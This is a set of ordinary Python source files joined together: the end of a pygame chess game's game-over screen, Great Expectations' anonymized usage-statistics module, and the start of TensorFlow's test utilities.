[int(BOARD_X + TILE_SIZE * 2.5), int(BOARD_Y + TILE_SIZE * 2.5), TILE_SIZE * 3, TILE_SIZE * 2],
1)
txt = BIG_FONT.render("Game Over", True, LARGE_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + TILE_SIZE * 3 - 8, int(BOARD_Y + TILE_SIZE * 2.5 + 4)))
# Draw win condition and winner (if applicable)
if winner:
txt = FONT.render(winner + " won", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + TILE_SIZE * 3, BOARD_Y + TILE_SIZE * 3 + 4))
txt = FONT.render(f"by {condition}", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + TILE_SIZE * 3, int(BOARD_Y + TILE_SIZE * 3.4)))
else:
txt = FONT.render(f"{condition}", True, SMALL_TEXT_COLOR)
if condition == "Insufficient Material":
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 2.55), int(BOARD_Y + TILE_SIZE * 3.3)))
else:
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 3.2), int(BOARD_Y + TILE_SIZE * 3.3)))
# Draw Rematch button
pygame.draw.rect(SCREEN, BLACK, [bg.left, bg.bottom - 28, bg.centerx - bg.left + 3, 28], 1)
txt = FONT.render("Rematch", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (bg.left + 8, bg.bottom - 28 + 2))
# Draw Leave button
pygame.draw.rect(SCREEN, BLACK, [bg.centerx + 2, bg.bottom - 28, bg.centerx - bg.left - 2, 28], 1)
txt = FONT.render("Leave", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (bg.centerx + 20, bg.bottom - 28 + 2))
if __name__ == "__main__":
Game()
|
usage_statistics.py
|
import atexit
import copy
import datetime
import enum
import json
import logging
import platform
import signal
import sys
import threading
import time
from functools import wraps
from queue import Queue
from types import FrameType
from typing import Callable, List, Optional
import jsonschema
import requests
from great_expectations import __version__ as ge_version
from great_expectations.core import ExpectationSuite
from great_expectations.core.usage_statistics.anonymizers.anonymizer import Anonymizer
from great_expectations.core.usage_statistics.anonymizers.types.base import (
CLISuiteInteractiveFlagCombinations,
)
from great_expectations.core.usage_statistics.execution_environment import (
GEExecutionEnvironment,
PackageInfo,
PackageInfoSchema,
)
from great_expectations.core.usage_statistics.schemas import (
anonymized_usage_statistics_record_schema,
)
from great_expectations.core.util import nested_update
from great_expectations.data_context.types.base import CheckpointConfig
from great_expectations.rule_based_profiler.config import RuleBasedProfilerConfig
STOP_SIGNAL = object()
logger = logging.getLogger(__name__)
_anonymizers = {}
class UsageStatsExceptionPrefix(enum.Enum):
EMIT_EXCEPTION = "UsageStatsException"
INVALID_MESSAGE = "UsageStatsInvalidMessage"
class UsageStatisticsHandler:
def __init__(
self,
data_context: "DataContext", # noqa: F821
data_context_id: str,
usage_statistics_url: str,
) -> None:
self._url = usage_statistics_url
self._data_context_id = data_context_id
self._data_context_instance_id = data_context.instance_id
self._data_context = data_context
self._ge_version = ge_version
self._message_queue = Queue()
self._worker = threading.Thread(target=self._requests_worker, daemon=True)
self._worker.start()
self._anonymizer = Anonymizer(data_context_id)
try:
self._sigterm_handler = signal.signal(signal.SIGTERM, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigterm_handler = None
try:
self._sigint_handler = signal.signal(signal.SIGINT, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigint_handler = None
atexit.register(self._close_worker)
@property
def anonymizer(self) -> Anonymizer:
return self._anonymizer
def _teardown(self, signum: int, frame: Optional[FrameType]) -> None:
self._close_worker()
if signum == signal.SIGTERM and self._sigterm_handler:
self._sigterm_handler(signum, frame)
if signum == signal.SIGINT and self._sigint_handler:
self._sigint_handler(signum, frame)
def _close_worker(self) -> None:
self._message_queue.put(STOP_SIGNAL)
self._worker.join()
def _requests_worker(self) -> None:
session = requests.Session()
while True:
message = self._message_queue.get()
if message == STOP_SIGNAL:
self._message_queue.task_done()
return
try:
res = session.post(self._url, json=message, timeout=2)
logger.debug(
"Posted usage stats: message status " + str(res.status_code)
)
if res.status_code != 201:
                    logger.debug(
                        "Server rejected message: %s", json.dumps(message, indent=2)
                    )
except requests.exceptions.Timeout:
logger.debug("Timeout while sending usage stats message.")
except Exception as e:
logger.debug("Unexpected error posting message: " + str(e))
finally:
self._message_queue.task_done()
def build_init_payload(self) -> dict:
"""Adds information that may be available only after full data context construction, but is useful to
calculate only one time (for example, anonymization)."""
expectation_suites: List[ExpectationSuite] = [
self._data_context.get_expectation_suite(expectation_suite_name)
for expectation_suite_name in self._data_context.list_expectation_suite_names()
]
init_payload = {
"platform.system": platform.system(),
"platform.release": platform.release(),
"version_info": str(sys.version_info),
"datasources": self._data_context.project_config_with_variables_substituted.datasources,
"stores": self._data_context.stores,
"validation_operators": self._data_context.validation_operators,
"data_docs_sites": self._data_context.project_config_with_variables_substituted.data_docs_sites,
"expectation_suites": expectation_suites,
"dependencies": self._get_serialized_dependencies(),
}
anonymized_init_payload = self._anonymizer.anonymize_init_payload(
init_payload=init_payload
)
return anonymized_init_payload
def _get_serialized_dependencies(self) -> List[dict]:
"""Get the serialized dependencies from the GEExecutionEnvironment."""
ge_execution_environment: GEExecutionEnvironment = GEExecutionEnvironment()
dependencies: List[PackageInfo] = ge_execution_environment.dependencies
schema: PackageInfoSchema = PackageInfoSchema()
serialized_dependencies: List[dict] = [
schema.dump(package_info) for package_info in dependencies
]
return serialized_dependencies
def build_envelope(self, message: dict) -> dict:
message["version"] = "1.0.0"
message["ge_version"] = self._ge_version
message["data_context_id"] = self._data_context_id
message["data_context_instance_id"] = self._data_context_instance_id
message["event_time"] = (
datetime.datetime.now(datetime.timezone.utc).strftime(
"%Y-%m-%dT%H:%M:%S.%f"
)[:-3]
+ "Z"
)
event_duration_property_name: str = f'{message["event"]}.duration'.replace(
".", "_"
)
if hasattr(self, event_duration_property_name):
delta_t: int = getattr(self, event_duration_property_name)
message["event_duration"] = delta_t
return message
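    # Illustrative example of a message after `build_envelope` above; all
    # concrete values are hypothetical:
    #
    #     {
    #         "event": "data_context.__init__",
    #         "event_payload": {...},
    #         "version": "1.0.0",
    #         "ge_version": "0.15.0",
    #         "data_context_id": "...",
    #         "data_context_instance_id": "...",
    #         "event_time": "2023-01-01T00:00:00.000Z",
    #         "event_duration": 42,  # only present if the usage-statistics
    #                                # decorator set "<event>_duration" on the handler
    #     }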
@staticmethod
def validate_message(message: dict, schema: dict) -> bool:
try:
jsonschema.validate(message, schema=schema)
return True
except jsonschema.ValidationError as e:
logger.debug(
f"{UsageStatsExceptionPrefix.INVALID_MESSAGE.value} invalid message: "
+ str(e)
)
return False
def send_usage_message(
self,
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
) -> None:
"""send a usage statistics message."""
# noinspection PyBroadException
try:
message: dict = {
"event": event,
"event_payload": event_payload or {},
"success": success,
}
self.emit(message)
except Exception:
pass
def emit(self, message: dict) -> None:
"""
Emit a message.
"""
try:
if message["event"] == "data_context.__init__":
message["event_payload"] = self.build_init_payload()
message = self.build_envelope(message=message)
if not self.validate_message(
message, schema=anonymized_usage_statistics_record_schema
):
return
self._message_queue.put(message)
# noinspection PyBroadException
except Exception as e:
# We *always* tolerate *any* error in usage statistics
log_message: str = (
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}"
)
logger.debug(log_message)
def get_usage_statistics_handler(args_array: list) -> Optional[UsageStatisticsHandler]:
try:
# If the object is usage_statistics-capable, then it will have a usage_statistics_handler
handler = getattr(args_array[0], "_usage_statistics_handler", None)
if handler is not None and not isinstance(handler, UsageStatisticsHandler):
logger.debug("Invalid UsageStatisticsHandler found on object.")
handler = None
except IndexError:
# A wrapped method that is not an object; this would be erroneous usage
logger.debug(
"usage_statistics enabled decorator should only be used on data context methods"
)
handler = None
except AttributeError:
# A wrapped method that is not usage_statistics capable
handler = None
except Exception as e:
# An unknown error -- but we still fail silently
logger.debug(
"Unrecognized error when trying to find usage_statistics_handler: " + str(e)
)
handler = None
return handler
def usage_statistics_enabled_method(
func: Optional[Callable] = None,
event_name: Optional[str] = None,
args_payload_fn: Optional[Callable] = None,
result_payload_fn: Optional[Callable] = None,
) -> Callable:
"""
A decorator for usage statistics which defaults to the less detailed payload schema.
"""
if callable(func):
if event_name is None:
event_name = func.__name__
@wraps(func)
def usage_statistics_wrapped_method(*args, **kwargs):
            # If a function like `build_data_docs()` is being called as a `dry_run`,
            # then we don't want to emit usage statistics; just run the function
            # without sending a usage_stats message.
if "dry_run" in kwargs and kwargs["dry_run"]:
return func(*args, **kwargs)
# Set event_payload now so it can be updated below
event_payload = {}
message = {"event_payload": event_payload, "event": event_name}
result = None
time_begin: int = int(round(time.time() * 1000))
try:
if args_payload_fn is not None:
nested_update(event_payload, args_payload_fn(*args, **kwargs))
result = func(*args, **kwargs)
message["success"] = True
except Exception:
message["success"] = False
raise
finally:
if not ((result is None) or (result_payload_fn is None)):
nested_update(event_payload, result_payload_fn(result))
time_end: int = int(round(time.time() * 1000))
delta_t: int = time_end - time_begin
handler = get_usage_statistics_handler(list(args))
if handler:
event_duration_property_name: str = (
f"{event_name}.duration".replace(".", "_")
)
setattr(handler, event_duration_property_name, delta_t)
handler.emit(message)
delattr(handler, event_duration_property_name)
return result
return usage_statistics_wrapped_method
else:
# noinspection PyShadowingNames
def usage_statistics_wrapped_method_partial(func):
return usage_statistics_enabled_method(
func,
event_name=event_name,
args_payload_fn=args_payload_fn,
result_payload_fn=result_payload_fn,
)
return usage_statistics_wrapped_method_partial
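# Illustrative usage sketch for `usage_statistics_enabled_method` above (not part
# of the original module): the decorator is meant for methods on
# usage_statistics-capable objects, i.e. objects carrying a
# `_usage_statistics_handler` attribute. The class and event name below are
# hypothetical.
#
#     class MyDataContext:
#         _usage_statistics_handler = None  # set to a UsageStatisticsHandler when enabled
#
#         @usage_statistics_enabled_method(event_name="data_context.build_data_docs")
#         def build_data_docs(self, dry_run=False):
#             ...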
# noinspection PyUnusedLocal
def run_validation_operator_usage_statistics(
data_context: "DataContext", # noqa: F821
validation_operator_name: str,
assets_to_validate: list,
**kwargs,
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
try:
payload["anonymized_operator_name"] = anonymizer.anonymize(
obj=validation_operator_name
)
except TypeError as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, run_validation_operator_usage_statistics: Unable to create validation_operator_name hash"
)
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer = data_context._usage_statistics_handler.anonymizer
payload["anonymized_batches"] = [
anonymizer.anonymize(obj=batch) for batch in assets_to_validate
]
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, run_validation_operator_usage_statistics: Unable to create anonymized_batches payload field"
)
return payload
# noinspection SpellCheckingInspection
# noinspection PyUnusedLocal
def save_expectation_suite_usage_statistics(
data_context: "DataContext", # noqa: F821
expectation_suite: ExpectationSuite,
expectation_suite_name: Optional[str] = None,
**kwargs,
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if expectation_suite_name is None:
if isinstance(expectation_suite, ExpectationSuite):
expectation_suite_name = expectation_suite.expectation_suite_name
elif isinstance(expectation_suite, dict):
expectation_suite_name = expectation_suite.get("expectation_suite_name")
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
obj=expectation_suite_name
)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, save_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def edit_expectation_suite_usage_statistics(
data_context: "DataContext", # noqa: F821
expectation_suite_name: str,
interactive_mode: Optional[CLISuiteInteractiveFlagCombinations] = None,
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
if interactive_mode is None:
payload = {}
else:
payload = copy.deepcopy(interactive_mode.value)
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
obj=expectation_suite_name
)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, edit_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def add_datasource_usage_statistics(
data_context: "DataContext", name: str, **kwargs # noqa: F821
) -> dict:
if not data_context._usage_statistics_handler:
return {}
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
from great_expectations.core.usage_statistics.anonymizers.datasource_anonymizer import (
DatasourceAnonymizer,
)
aggregate_anonymizer = Anonymizer(salt=data_context_id)
datasource_anonymizer = DatasourceAnonymizer(
salt=data_context_id, aggregate_anonymizer=aggregate_anonymizer
)
payload = {}
# noinspection PyBroadException
try:
payload = datasource_anonymizer._anonymize_datasource_info(name, kwargs)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, add_datasource_usage_statistics: Unable to create add_datasource_usage_statistics payload field"
)
return payload
# noinspection SpellCheckingInspection
def get_batch_list_usage_statistics(
data_context: "DataContext", *args, **kwargs # noqa: F821
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer: Anonymizer = ( # noqa: F821
data_context._usage_statistics_handler.anonymizer
)
payload = anonymizer.anonymize(*args, **kwargs)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, get_batch_list_usage_statistics: Unable to create anonymized_batch_request payload field"
)
return payload
# noinspection PyUnusedLocal
def get_checkpoint_run_usage_statistics(
checkpoint: "Checkpoint", # noqa: F821
*args,
**kwargs,
) -> dict:
usage_statistics_handler: Optional[
UsageStatisticsHandler
] = checkpoint._usage_statistics_handler
data_context_id: Optional[str] = None
try:
data_context_id = checkpoint.data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer: Optional[Anonymizer] = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload: dict = {}
if usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer = usage_statistics_handler.anonymizer # noqa: F821
resolved_runtime_kwargs: dict = (
CheckpointConfig.resolve_config_using_acceptable_arguments(
*(checkpoint,), **kwargs
)
)
payload: dict = anonymizer.anonymize(
*(checkpoint,), **resolved_runtime_kwargs
)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, get_checkpoint_run_usage_statistics: Unable to create anonymized_checkpoint_run payload field"
)
return payload
def get_profiler_run_usage_statistics(
profiler: "RuleBasedProfiler", # noqa: F821
variables: Optional[dict] = None,
rules: Optional[dict] = None,
*args,
**kwargs,
) -> dict:
usage_statistics_handler: Optional[
UsageStatisticsHandler
] = profiler._usage_statistics_handler
data_context_id: Optional[str] = None
if usage_statistics_handler:
data_context_id = usage_statistics_handler._data_context_id
anonymizer: Optional[Anonymizer] = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload: dict = {}
if usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer = usage_statistics_handler.anonymizer
resolved_runtime_config: "RuleBasedProfilerConfig" = ( # noqa: F821
RuleBasedProfilerConfig.resolve_config_using_acceptable_arguments(
profiler=profiler,
variables=variables,
rules=rules,
)
)
payload: dict = anonymizer.anonymize(obj=resolved_runtime_config)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, get_profiler_run_usage_statistics: Unable to create anonymized_profiler_run payload field"
)
return payload
def send_usage_message(
data_context: "DataContext", # noqa: F821
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
) -> None:
"""send a usage statistics message."""
# noinspection PyBroadException
try:
handler: UsageStatisticsHandler = getattr(
data_context, "_usage_statistics_handler", None
)
message: dict = {
"event": event,
"event_payload": event_payload,
"success": success,
}
if handler is not None:
handler.emit(message)
except Exception:
pass
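# Illustrative usage sketch for `send_usage_message` above; `context` and the
# event name are hypothetical:
#
#     send_usage_message(
#         data_context=context,
#         event="cli.docs.build",
#         event_payload={"api_version": "v3"},
#         success=True,
#     )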
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
return None
try:
from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
pass
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
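# Illustrative example for `assert_ops_in_graph` above (names are hypothetical;
# assumes `from tensorflow.python.framework import constant_op`):
#
#   g = ops.Graph()
#   with g.as_default():
#     constant_op.constant(1.0, name="my_const")
#   assert_ops_in_graph({"my_const": "Const"}, g)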
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
      tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(compat.as_bytes(_SHARDED_SAVE_OP_PATTERN),
attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(compat.as_bytes(_TABLE_SHARED_NAME_PATTERN),
node.attr["shared_name"].s):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
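# Worked example for `NHWCToNCHW` above, using the shape-array form:
# NHWCToNCHW([2, 32, 32, 3]) returns [2, 3, 32, 32], i.e.
# (batch, height, width, channels) -> (batch, channels, height, width).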
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
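# Worked example for `NHWCToNCHW_VECT_C` above, using the shape-array form:
# NHWCToNCHW_VECT_C([1, 4, 4, 8]) first splits the channel dimension into
# groups of 4, giving [1, 4, 4, 2, 4], then permutes to [1, 2, 4, 4, 4].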
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
